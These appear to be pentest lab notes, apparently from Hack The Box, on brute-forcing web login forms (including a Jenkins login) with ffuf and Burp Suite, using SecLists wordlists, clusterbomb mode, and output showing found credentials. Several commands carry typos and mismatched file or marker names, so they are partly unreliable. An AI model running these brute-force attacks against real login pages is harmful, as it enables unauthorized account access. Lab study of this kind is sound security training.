FFUF
OPTION 1: CUSTOM WORDLIST
root@oco:~$ ffuf -w ./customPWList.txt -u http://94.237.59.180:47925/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=admin&password=FUZZ" -fr "Invalid username"
root@oco:~$ ffuf -w allowed.userlist:USER -w allowed.userlist.passwd:PASS -u http://10.129.1.15/login.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "Username=USER&Password=PASS" -fr "Warning! Incorrect information."OPTION 2: FFUF W/ BURP
root@htb:~$ burpsuite
BURP > Proxy > BROWSER
URL: 10.129.178.161:8080
- Forward requests until the full page is loaded
BURP > BROWSER > http://10.129.178.161:8080/login?from=%2F
Welcome to Jenkins!
Username: null
Password: null
* forward request
BURP > Proxy > BROWSER
Requests
...
POST /j_spring_security_check HTTP/1.1
Host: 10.129.178.161:8080
Content-Length: 55
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.129.178.161:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.129.178.161:8080/login?from=%2F
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID.9d35f114=node01hvgj3wjo0ofrnt7s0zzlo2ew0.node0
Connection: close
j_username=null&j_password=null&from=%2F&Submit=Sign+in
right-click on the "request" section > copy to file
Filename: requests.txt
File Type: All Files
root@htb:~$ nano requests.txt
...
j_username=unameFUZZ&j_password=pwFUZZ&from=%2F&Submit=Sign+in
* add the {FUZZ} markers to the username/password section
root@htb:~$ ffuf -request request.txt -request-proto http -mode clusterbomb -w uName.txt:UFUZZ -w pWord.txt:PFUZZ -c -fr "Invalid username or password"
[Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 14ms]
* PFUZZ: root
* UFUZZ: admin
[Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 17ms]
* PFUZZ: password1
* UFUZZ: admin
root@htb:~$ fuf -request request.txt -request-proto http -mode clusterbomb -w uName.txt:unameFUZZ -w pWord.txt:pwFUZZ -c -fr "Invalid username or password" -r
[Status: 200, Size: 17516, Words: 1111, Lines: 33, Duration: 87ms]
* PFUZZ: admin1
* UFUZZ: root
[Status: 200, Size: 17516, Words: 1111, Lines: 33, Duration: 96ms]
* PFUZZ: password
* UFUZZ: root
[Status: 200, Size: 17516, Words: 1111, Lines: 33, Duration: 87ms]
* PFUZZ: root
* UFUZZ: root
[Status: 200, Size: 17514, Words: 1111, Lines: 33, Duration: 78ms]
* PFUZZ: password1
* UFUZZ: root
[Status: 200, Size: 17516, Words: 1111, Lines: 33, Duration: 88ms]
* PFUZZ: admin
* UFUZZ: root
root@htb:~$ root@htb:~$ fuf -request request.txt -request-proto http -mode clusterbomb -w uName.txt:unameFUZZ -w pWord.txt:pwFUZZ -c -fr "Invalid username or password" -r -fs 19540
* the -c flag outputs the result in color
* the -r flag follows HTTP redirects during fuzzing
* the -fs flag filters results based on content size
* the -fr flag filters results based on a regex pattern.
* the final result will contain a handful of possible credentials to useOPTION 3:
#walk the application
root@htb:~$ BROWSER > http://10.129.140.205/
username: admin
password: pass
error msg: Wrong Credentials
* login page identified
#conduct code review
root@htb:~$ BROWSER > http://10.129.140.205/ > CTRL+U
* nothing pertinent
#brute force login page
root@htb:~$ find / -iname usernames 2>/dev/null
/usr/share/seclists/Usernames
root@htb:~$ ls
top-usernames-shortlist.txt
root@htb:~$ cp /usr/share/seclists/Usernames/top-usernames-shortlist.txt .
root@htb:~$ find / -iname passwords 2>/dev/null
/usr/share/seclists/Passwords
root@htb:~$ ls
500-worst-passwords.txt
root@htb:~$ cp /usr/share/seclists/Passwords/500-worst-passwords.txt .
#retrieve site parameters
root@htb:~$ burpsuite
BURP > Proxy > BROWSER
URL: 10.129.140.205
- Forward requests until the full page is loaded
BURP > BROWSER > http://10.129.140.205
Welcome ...
Username: admin
Password: pass
BURP > Proxy > BROWSER
Requests
...
PPOST / HTTP/1.1
Host: 10.129.140.205
Content-Length: 28
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://10.129.140.205
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.129.140.205/
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=r6m4ghtpl8mo8atrkkig8na2kk
Connection: keep-alive
username=admin&password=pass
right-click on the "request" section > copy to file
Filename: requests.txt
File Type: All Files
root@htb:~$ nano requests.txt
...
username=unameFUZZ&password=passFUZZ
j_username=unameFUZZ&j_password=pwFUZZ&from=%2F&Submit=Sign+in
* add the {FUZZ} markers to the username/password section
root@htb:~$ fuf -request requests.txt -request-proto http -mode clusterbomb -w top-usernames-shortlist.txt:unameFUZZ -w 500-worst-passwords.txt:passFUZZ -c -fr "Wrong Credentials" -r
[Status: 200, Size: 3149, Words: 1177, Lines: 97, Duration: 15ms]
* passFUZZ: password
* unameFUZZ: admin
:: Progress: [8483/8483] :: Job [1/1] :: 263 req/sec :: Duration: [0:00:29] :: Errors: 0 ::
* ensure the value username and password value matches in both ffuf and reqests.txt
* ffuf's default mode is pitchfork matching
- this is where the wordlist is matched line by line
- ffuf can simulate Burp Suite's clusterbomb style through the use of
recursion with multiple -w flags or with -request-proto or custom-made
requests using -request.
- clusterbomb combines all permutations of multiple payload positions
similar to a nested loop of each payload set.
* the -c flag outputs the result in color
* the -r flag follows HTTP redirects during fuzzing
* the -fs flag filters results based on content size
* the -fr flag filters results based on a regex pattern.
* the final result will contain a handful of possible credentials to useLast updated